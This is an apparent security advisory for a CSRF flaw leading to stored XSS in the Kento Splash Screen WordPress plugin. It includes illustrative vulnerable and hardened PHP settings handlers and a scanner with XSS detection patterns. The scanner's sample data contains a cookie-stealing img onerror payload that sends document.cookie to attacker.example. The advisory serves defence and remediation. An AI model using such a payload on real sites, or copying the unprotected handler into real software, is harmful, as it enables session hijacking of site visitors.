CVE-2025-48351
PluginsPoint · PluginsPoint Kento Splash Screen
**A high-severity Cross-Site Request Forgery (CSRF) vulnerability in PluginsPoint Kento Splash Screen allows for Stored XSS, potentially enabling an attacker to compromise user sessions.**
Executive summary
A high-severity Cross-Site Request Forgery (CSRF) vulnerability in PluginsPoint Kento Splash Screen allows for Stored XSS, potentially enabling an attacker to compromise user sessions.
Vulnerability
The plugin is vulnerable to Cross-Site Request Forgery (CSRF): the request that saves the splash screen configuration can be forged from a page the attacker controls. An unauthenticated attacker who lures a logged-in administrator to such a page can therefore submit a crafted configuration that stores a malicious script (Stored XSS) in the splash screen settings. Because the splash screen is site-wide, that script is then served to every visitor who is shown it, not only to the administrator who was tricked.
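To make the chain concrete, the following is an illustrative WordPress settings handler added here by the editor; it is not Kento Splash Screen's code, and every function, action, option and nonce name starting with `example_` is hypothetical. The first handler shows the shape of the flaw (a save action that checks nothing and stores raw HTML); the second shows the three controls that close it: a nonce against forgery, a capability check for authorisation, and an allowlist sanitiser against stored XSS.

```php
<?php
// Illustrative example added by the editor; not the plugin's or WordPress core's code.
// All example_* names are hypothetical placeholders.

// --- Vulnerable pattern: a settings save handler with no forgery protection ---
// Any page that can make the administrator's browser POST to admin-post.php can
// change the splash screen HTML, because the handler verifies nothing about the
// request and stores the submitted markup verbatim.
function example_splash_save_vulnerable() {
    $html = isset( $_POST['splash_html'] ) ? wp_unslash( $_POST['splash_html'] ) : '';
    update_option( 'example_splash_html', $html ); // raw HTML stored, later echoed to visitors
    wp_safe_redirect( admin_url( 'options-general.php?page=example-splash' ) );
    exit;
}

// --- Hardened pattern: nonce, capability and sanitisation on the same handler ---
function example_splash_save_hardened() {
    // 1. CSRF: the request must carry a nonce issued to this user for this action.
    //    check_admin_referer() stops the request with a 403 page if it is missing or invalid.
    check_admin_referer( 'example_splash_save', 'example_splash_nonce' );

    // 2. Authorisation: a valid nonce only proves the request came from the settings
    //    page; the capability check proves the user may change site options at all.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to change these settings.' ), 403 );
    }

    // 3. Stored XSS: keep only the post-content HTML allowlist. <script> elements,
    //    on* event handlers and javascript: URLs are stripped before the value is saved.
    $html = isset( $_POST['splash_html'] )
        ? wp_kses_post( wp_unslash( $_POST['splash_html'] ) )
        : '';
    update_option( 'example_splash_html', $html );

    wp_safe_redirect( admin_url( 'options-general.php?page=example-splash' ) );
    exit;
}
add_action( 'admin_post_example_splash_save', 'example_splash_save_hardened' );

// The settings form must emit the matching nonce field for check_admin_referer() to verify.
function example_splash_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="example_splash_save">
        <?php wp_nonce_field( 'example_splash_save', 'example_splash_nonce' ); ?>
        <textarea name="splash_html"><?php echo esc_textarea( get_option( 'example_splash_html', '' ) ); ?></textarea>
        <?php submit_button( 'Save splash screen' ); ?>
    </form>
    <?php
}

// Output side: filter again at render time instead of trusting whatever is in the database,
// so a value written before the fix (or by another path) still cannot run script.
function example_render_splash() {
    echo wp_kses_post( get_option( 'example_splash_html', '' ) );
}
```

Two design notes. The nonce and the capability check are separate controls: a nonce alone would still let a low-privileged logged-in user with access to the page save settings, and a capability check alone does nothing against a forged request sent by the administrator's own browser. `wp_kses_post()` is an allowlist that still permits ordinary markup, which is usually what a splash screen needs; if the feature only ever needs plain text, `sanitize_text_field()` is the tighter choice.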
Business impact
Rated as High severity with a CVSS score of 7.1, this vulnerability poses a significant risk. An attacker can use this flaw to execute arbitrary JavaScript in the browsers of every user who sees the splash screen. This could be used to steal session cookies, capture credentials, or redirect users to malicious websites before they even reach the main site content.
Remediation
Immediate Action: Update the PluginsPoint Kento Splash Screen plugin to the latest patched version from the vendor to eliminate the vulnerability.
Proactive Monitoring: Inspect the splash screen configuration and its related database entries (for a WordPress plugin, normally its rows in the wp_options table) for injected script tags, inline event-handler attributes, javascript: URLs or unexpected external resources, and review the web server and access logs for administrator requests to the plugin's settings endpoint that did not originate from the site's own admin pages.
Compensating Controls: A Web Application Firewall (WAF) can filter requests carrying obvious XSS payloads and buy time until the update is applied, but it should be treated as an interim control only: a forged request looks like a legitimate settings save, so a WAF cannot reliably distinguish CSRF from normal administration, and payload filters are routinely bypassed with encoding variations. Updating the plugin remains the actual fix.
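The following scanner is an added example from the editor for the monitoring step above; it is not part of the plugin, of WordPress or of any vendor tooling. It runs stand-alone with PHP on the command line over rows shaped like a `wp option list --format=json` export (keys `option_name` and `option_value`, which is the shape that command produces) and flags values containing markers a settings form should never have saved. The sample rows, the option names and the `attacker.example` host are constructed for the demonstration.

```php
<?php
// Illustrative scanner added by the editor; not the plugin's or WordPress core's code.
// Usage:  php scan_options.php                 (runs on the constructed sample below)
//         php scan_options.php options.json    (options.json from `wp option list --format=json`)

/**
 * Return one hit per (option, marker) pair for every option_value that contains
 * a construct a splash-screen configuration saved through the UI should never hold.
 * The patterns are deliberately conservative for triage, so expect some false positives.
 *
 * @param array $rows  list of ['option_name' => string, 'option_value' => string]
 * @return array       list of ['option_name' => string, 'marker' => string]
 */
function example_find_script_injections( array $rows ): array {
    $markers = [
        'script tag'         => '/<\s*script\b/i',
        // whitespace before on* so that attribute names are matched, not words like "one="
        'event handler attr' => '/\son[a-z]+\s*=/i',
        'javascript: URL'    => '/javascript\s*:/i',
        'inline frame'       => '/<\s*iframe\b/i',
        'data:text/html URL' => '/data\s*:\s*text\/html/i',
        'srcdoc attr'        => '/\bsrcdoc\s*=/i',
    ];

    $hits = [];
    foreach ( $rows as $row ) {
        // Decode entities once so a value stored as "&lt;script&gt;" (for instance by a
        // double-encoding attempt) is still visible to the patterns below.
        $value = html_entity_decode( (string) $row['option_value'], ENT_QUOTES | ENT_HTML5, 'UTF-8' );
        foreach ( $markers as $label => $pattern ) {
            if ( preg_match( $pattern, $value ) ) {
                $hits[] = [ 'option_name' => (string) $row['option_name'], 'marker' => $label ];
            }
        }
    }
    return $hits;
}

// Constructed sample standing in for a wp_options export. Only the second row is malicious:
// an image whose onerror handler exfiltrates the visitor's cookies.
$sample = [
    [ 'option_name' => 'example_splash_html',   'option_value' => '<div class="splash"><h1>Welcome</h1><a href="/shop">Enter</a></div>' ],
    [ 'option_name' => 'example_splash_html_2', 'option_value' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' ],
    [ 'option_name' => 'blogname',              'option_value' => 'Example Store' ],
];

$rows = $sample;
if ( isset( $argv[1] ) && is_readable( $argv[1] ) ) {
    $decoded = json_decode( (string) file_get_contents( $argv[1] ), true );
    if ( is_array( $decoded ) ) {
        $rows = $decoded;
    }
}

$hits = example_find_script_injections( $rows );
if ( empty( $hits ) ) {
    echo "No script-injection markers found in " . count( $rows ) . " option(s).\n";
} else {
    foreach ( $hits as $hit ) {
        printf( "SUSPECT %-28s %s\n", $hit['option_name'], $hit['marker'] );
    }
}
```

On the constructed sample the scanner reports only `example_splash_html_2` (event handler attribute); the benign splash markup and the unrelated `blogname` option pass. A hit is a prompt to pull the full option value and compare it against what the site owner actually configured, not proof of compromise, and a clean result does not prove the absence of a payload that uses a construct outside this marker list.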
Exploitation status
Public Exploit Available: false
Analyst recommendation
The ability to inject persistent malicious code into a site-wide element like a splash screen is a serious security issue, because a single forged request against one administrator exposes every visitor to the site. Given the High severity rating, immediate action is required: administrators must update the plugin without delay, then check the existing splash screen configuration for content that was injected before the update, since patching the plugin does not remove a payload that is already stored.